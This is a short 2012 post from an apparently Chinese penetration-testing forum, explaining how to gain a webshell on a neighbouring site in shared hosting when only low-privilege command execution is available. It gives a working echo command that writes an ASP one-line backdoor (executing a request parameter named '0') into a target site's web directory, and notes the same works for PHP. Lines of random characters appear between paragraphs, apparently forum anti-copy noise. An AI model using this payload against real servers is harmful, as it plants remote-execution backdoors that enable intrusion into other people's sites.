中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]
作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
8 Y/ V$ Z) b* @5 ]5 g8 D: ?0 m9 O  m  `. ?* ?
命令格式0 I5 }- W( F( b& H: R; p
9 O" e+ }. m- q. D  W
Echo 语句 >目标站绝对目录
/ N6 |9 L6 T) s+ ]- Q" `* m* U! `& z  z7 O& U4 h. d; @. S5 P
例如:
' N3 T9 H: t- ?8 k9 |$ R- r0 G1 ~; G5 p7 K7 U
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
' O" h8 h+ [  A+ {# e3 R9 m5 o& O$ S5 L. U
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
, s# G( ^8 o; o) D' z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2